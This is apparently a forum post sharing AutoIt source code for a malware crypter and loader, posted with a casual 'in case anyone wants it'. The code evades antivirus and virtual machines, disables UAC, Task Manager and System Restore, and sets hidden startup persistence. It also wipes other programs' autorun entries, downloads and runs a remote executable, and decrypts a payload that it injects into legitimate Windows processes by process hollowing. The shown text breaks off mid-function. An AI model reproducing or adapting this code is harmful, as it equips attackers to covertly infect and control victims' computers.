13 Years of Service
24%
por si alguien lo quiere :Lol
Code:
>#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "replaceme"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $fake = IniRead($uniscriptdir & "\settings.ini", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $delay = IniRead($uniscriptdir & "\settings.ini", "delay1", "delay2", "NotFound")
If $delay = "delay3" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\settings.ini", "mutex1", "mutex2", "NotFound")
If $mutex = "mutex3" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\settings.ini", "start1", "start2", "NotFound")
If $startup = "start3" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\settings.ini", "antis1", "antis2", "NotFound")
If $antis = "antis3" Then
antis()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\settings.ini", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\settings.ini", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\settings.ini", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\settings.ini", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\settings.ini", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf
Func delay()
Sleep(30000)
EndFunc
Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
Func mutex()
$scriptname = "replace-autoit3.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc
Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup, "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\start.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\start.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\start.cmd", 1)
$autoit3 = "autoit3-replace"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\start.vbs", 1)
FileWrite($vbs, "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & 'start.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\start.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\start.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\start.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc
Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc
Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc
Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc
Func fakemessage()
$type = IniRead($uniscriptdir & "\settings.ini", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\settings.ini", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\settings.ini", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc
Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) + -1
ProcessClose($a[$i][0])
Next
Exit
EndFunc
Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc
Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = + -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $_d210hfghdfg54f5f64g65dfghfghfgh5 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
Func _crypt_encryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
Local $hbuff
Local $ierror
Local $vreturn
Local $reqbuffsize
Local $aret
_crypt_startup()
Do
If $ialg_id $calg_userkey Then
$vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
If @error Then
$ierror = 1
$vreturn = + -1
ExitLoop
EndIf
EndIf
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vdata), "dword", 0)
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = + -1
ExitLoop
EndIf
$reqbuffsize = $aret[6]
$hbuff = DllStructCreate("byte[" & $reqbuffsize & "]")
DllStructSetData($hbuff, 1, $vdata)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata), "dword", DllStructGetSize($hbuff))
If @error OR NOT $aret[0] Then
$ierror = 3
$vreturn = + -1
ExitLoop
EndIf
$ierror = 0
$vreturn = DllStructGetData($hbuff, 1)
Until True
Return $vreturn
EndFunc
Func _crypt_decryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
Local $hbuff
Local $ierror
Local $vreturn
Local $htempstruct
Local $iplaintextsize
Local $aret
_crypt_startup()
Do
If $ialg_id $calg_userkey Then
$vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
If @error Then
$ierror = 1
$vreturn = + -1
ExitLoop
EndIf
EndIf
$hbuff = DllStructCreate("byte[" & BinaryLen($vdata) + 1000 & "]")
DllStructSetData($hbuff, 1, $vdata)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata))
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = + -1
ExitLoop
EndIf
$iplaintextsize = $aret[6]
$htempstruct = DllStructCreate("byte[" & $iplaintextsize & "]", DllStructGetPtr($hbuff))
$ierror = 0
$vreturn = DllStructGetData($htempstruct, 1)
Until True
Return $vreturn
EndFunc
Func _crypt_startup()
If __crypt_refcount() = 0 Then
Local $hadvapi32 = DllOpen("Advapi32.dll")
If @error Then Return SetError(1, 0, False)
__crypt_dllhandleset($hadvapi32)
Local $aret
Local $iproviderid = $prov_rsa_aes
If @OSVersion = "WIN_2000" Then $iproviderid = $prov_rsa_full
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext)
If @error OR NOT $aret[0] Then
DllClose(__crypt_dllhandle())
Return SetError(2, 0, False)
Else
__crypt_contextset($aret[1])
EndIf
EndIf
__crypt_refcountinc()
Return True
EndFunc
Func _crypt_derivekey($vpassword, $ialg_id, $ihash_alg_id = $calg_md5)
Local $aret
Local $hcrypthash
Local $hbuff
Local $ierror
Local $vreturn
_crypt_startup()
Do
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihash_alg_id, "ptr", 0, "dword", 0, "handle*", 0)
If @error OR NOT $aret[0] Then
$ierror = 1
$vreturn = + -1
ExitLoop
EndIf
$hcrypthash = $aret[5]
$hbuff = DllStructCreate("byte[" & BinaryLen($vpassword) & "]")
DllStructSetData($hbuff, 1, $vpassword)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = + -1
ExitLoop
EndIf
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialg_id, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0)
If @error OR NOT $aret[0] Then
$ierror = 3
$vreturn = + -1
ExitLoop
EndIf
$ierror = 0
$vreturn = $aret[5]
Until True
If $hcrypthash 0 Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
Return SetError($ierror, 0, $vreturn)
EndFunc
Func __crypt_contextset($hcryptcontext)
$__g_acryptinternaldata[2] = $hcryptcontext
EndFunc
Func __crypt_context()
Return $__g_acryptinternaldata[2]
EndFunc
Func __crypt_dllhandleset($hadvapi32)
$__g_acryptinternaldata[1] = $hadvapi32
EndFunc
Func __crypt_dllhandle()
Return $__g_acryptinternaldata[1]
EndFunc
Func __crypt_refcountdec()
If $__g_acryptinternaldata[0] > 0 Then $__g_acryptinternaldata[0] -= 1
EndFunc
Func __crypt_refcountinc()
$__g_acryptinternaldata[0] += 1
EndFunc
Func __crypt_refcount()
Return $__g_acryptinternaldata[0]
EndFunc
submain()
Func submain()
$_d2105 = IniRead($uniscriptdir & "\settings.ini", "decryptkey1", "decryptkey2", "NotFound")
$_d210hfghfghfghfgh5 = FileGetShortName(@ScriptDir & "\crypted-binary.dat")
$sapppath = FileRead(FileOpen($_d210hfghfghfghfgh5, 16))
$sarquive = _crypt_decryptdata($sapppath, $_d2105, $_d210hfghdfg54f5f64g65dfghfghfgh5)
_runpe($sarquive)
EndFunc
Func info($getfiledata, $stringtoget)
Return StringTrimLeft($getfiledata, StringInStr($getfiledata, $stringtoget) + -1 + StringLen($stringtoget))
EndFunc
Func _runpe($_dskljfkjhdfkgjfgfdgdf, $_dskljfkjhdf00kgjfgfdgdf = "")
#Region 1. DETERMINE INTERPRETER TYPE
Local $_dddhg21h5gf61h3fg132fg = @AutoItX64
#Region 2. PREDPROCESSING PASSED
Local $_dddhghfskljfkjhdf00kgjfgfdgdf = Binary($_dskljfkjhdfkgjfgfdgdf)
Local $_dddhghfskljfkjhfghgfhfhfgh = DllStructCreate("BYTE[" & BinaryLen($_dddhghfskljfkjhdf00kgjfgfdgdf) & "]")
DllStructSetData($_dddhghfskljfkjhfghgfhfhfgh, 1, $_dddhghfskljfkjhdf00kgjfgfdgdf)
Local $_dddhg21hfghfghfghfghffhf = DllStructGetPtr($_dddhghfskljfkjhfghgfhfhfgh)
#Region 3. CREATING NEW PROCESS
Local $tstartupinfo = DllStructCreate("DWORD CBSIZE;" & "PTR RESERVED;" & "PTR DESKTOP;" & "PTR TITLE;" & "DWORD X;" & "DWORD Y;" & "DWORD XSIZE;" & "DWORD YSIZE;" & "DWORD XCOUNTCHARS;" & "DWORD YCOUNTCHARS;" & "DWORD FILLATTRIBUTE;" & "DWORD FLAGS;" & "WORD SHOWWINDOW;" & "WORD RESERVED2;" & "PTR RESERVED2;" & "PTR HSTDINPUT;" & "PTR HSTDOUTPUT;" & "PTR HSTDERROR")
Local $tprocess_information = DllStructCreate("PTR PROCESS;" & "PTR THREAD;" & "DWORD PROCESSID;" & "DWORD THREADID")
$inject_net2_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe")
$inject_net2_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe")
$inject_net2_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe")
$inject_net4_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe")
$inject_net4_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe")
$inject_net4_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe")
$inject_newdev = ($unicode_system & "\newdev.exe")
$inject_twunk_32 = ($unicode_windows & "\twunk_32.exe")
$inject_ndadmin = ($unicode_system & "\ndadmin.exe")
If FileExists($inject_net2_regsvc) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regsvc, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net2_regasm) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regasm, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net2_applaunch) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_applaunch, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_regsvc) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regsvc, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_regasm) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regasm, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_applaunch) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_applaunch, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_newdev) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_newdev, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_twunk_32) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_twunk_32, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
Else
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_ndadmin, "WSTR", $_dskljfkjhdf00kgjfgfdgdf, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
EndIf
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Local $hprocess = DllStructGetData($tprocess_information, "PROCESS")
Local $hthread = DllStructGetData($tprocess_information, "THREAD")
If $_dddhg21h5gf61h3fg132fg AND __runpe_iswow64process($hprocess) Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(2, 0, 0)
EndIf
#Region 4. FILL CONTEXT STRUCTURE
Local $irunflag, $tcontext
If $_dddhg21h5gf61h3fg132fg Then
If @OSArch = "X64" Then
$irunflag = 2
$tcontext = DllStructCreate("ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & "DWORD CONTEXTFLAGS; DWORD MXCSR;" & "WORD SEGCS; WORD SEGDS; WORD SEGES; WORD SEGFS; WORD SEGGS; WORD SEGSS; DWORD EFLAGS;" & "UINT64 DR0; UINT64 DR1; UINT64 DR2; UINT64 DR3; UINT64 DR6; UINT64 DR7;" & "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; UINT64 R13; UINT64 R14; UINT64 R15;" & "UINT64 RIP;" & "UINT64 HEADER[4]; UINT64 LEGACY[16]; UINT64 XMM0[2]; UINT64 XMM1[2]; UINT64 XMM2[2]; UINT64 XMM3[2]; UINT64 XMM4[2]; UINT64 XMM5[2]; UINT64 XMM6[2]; UINT64 XMM7[2]; UINT64 XMM8[2]; UINT64 XMM9[2]; UINT64 XMM10[2]; UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; UINT64 XMM14[2]; UINT64 XMM15[2];" & "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; UINT64 LASTEXCEPTIONFROMRIP")
Else
$irunflag = 3
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(102, 0, 0)
EndIf
Else
$irunflag = 1
$tcontext = DllStructCreate("DWORD CONTEXTFLAGS;" & "DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & "DWORD CONTROLWORD; DWORD STATUSWORD; DWORD TAGWORD; DWORD ERROROFFSET; DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & "DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & "DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & "DWORD EBP; DWORD EIP; DWORD SEGCS; DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & "BYTE EXTENDEDREGISTERS[512]")
EndIf
Local $context_full
Switch $irunflag
Case 1
$context_full = 65543
Case 2
$context_full = 1048583
Case 3
$context_full = 524327
EndSwitch
DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full)
$acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(3, 0, 0)
EndIf
Local $ppeb
Switch $irunflag
Case 1
$ppeb = DllStructGetData($tcontext, "EBX")
Case 2
$ppeb = DllStructGetData($tcontext, "RDX")
Case 3
EndSwitch
#Region 5. READ PE-FORMAT
Local $timage_dos_header = DllStructCreate("CHAR MAGIC[2];" & "WORD BYTESONLASTPAGE;" & "WORD PAGES;" & "WORD RELOCATIONS;" & "WORD SIZEOFHEADER;" & "WORD MINIMUMEXTRA;" & "WORD MAXIMUMEXTRA;" & "WORD SS;" & "WORD SP;" & "WORD CHECKSUM;" & "WORD IP;" & "WORD CS;" & "WORD RELOCATION;" & "WORD OVERLAY;" & "CHAR RESERVED[8];" & "WORD OEMIDENTIFIER;" & "WORD OEMINFORMATION;" & "CHAR RESERVED2[20];" & "DWORD ADDRESSOFNEWEXEHEADER", $_dddhg21hfghfghfghfghffhf)
Local $pheaders_new = $_dddhg21hfghfghfghfghffhf
$_dddhg21hfghfghfghfghffhf += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER")
Local $smagic = DllStructGetData($timage_dos_header, "MAGIC")
If NOT ($smagic == "MZ") Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(4, 0, 0)
EndIf
Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $_dddhg21hfghfghfghfghffhf)
$_dddhg21hfghfghfghfghffhf += 4
If DllStructGetData($timage_nt_signature, "SIGNATURE") 17744 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(5, 0, 0)
EndIf
Local $timage_file_header = DllStructCreate("WORD MACHINE;" & "WORD NUMBEROFSECTIONS;" & "DWORD TIMEDATESTAMP;" & "DWORD POINTERTOSYMBOLTABLE;" & "DWORD NUMBEROFSYMBOLS;" & "WORD SIZEOFOPTIONALHEADER;" & "WORD CHARACTERISTICS", $_dddhg21hfghfghfghfghffhf)
Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS")
$_dddhg21hfghfghfghfghffhf += 20
Local $tmagic = DllStructCreate("WORD MAGIC;", $_dddhg21hfghfghfghfghffhf)
Local $imagic = DllStructGetData($tmagic, 1)
Local $timage_optional_header
If $imagic = 267 Then
If $_dddhg21h5gf61h3fg132fg Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
$timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "DWORD BASEOFDATA;" & "DWORD IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "DWORD SIZEOFSTACKRESERVE;" & "DWORD SIZEOFSTACKCOMMIT;" & "DWORD SIZEOFHEAPRESERVE;" & "DWORD SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $_dddhg21hfghfghfghfghffhf)
$_dddhg21hfghfghfghfghffhf += 96
ElseIf $imagic = 523 Then
If NOT $_dddhg21h5gf61h3fg132fg Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
$timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "UINT64 IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "UINT64 SIZEOFSTACKRESERVE;" & "UINT64 SIZEOFSTACKCOMMIT;" & "UINT64 SIZEOFHEAPRESERVE;" & "UINT64 SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $_dddhg21hfghfghfghfghffhf)
$_dddhg21hfghfghfghfghffhf += 112
Else
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT")
Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS")
Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE")
Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE")
$_dddhg21hfghfghfghfghffhf += 8
$_dddhg21hfghfghfghfghffhf += 8
$_dddhg21hfghfghfghfghffhf += 24
Local $timage_directory_entry_basereloc = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZE", $_dddhg21hfghfghfghfghffhf)
Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS")
Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE")
Local $frelocatable
If $paddressnewbasereloc AND $isizebasereloc Then $frelocatable = True
If NOT $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
$_dddhg21hfghfghfghfghffhf += 88
#Region 6. ALLOCATE 'NEW' MEMORY SPACE
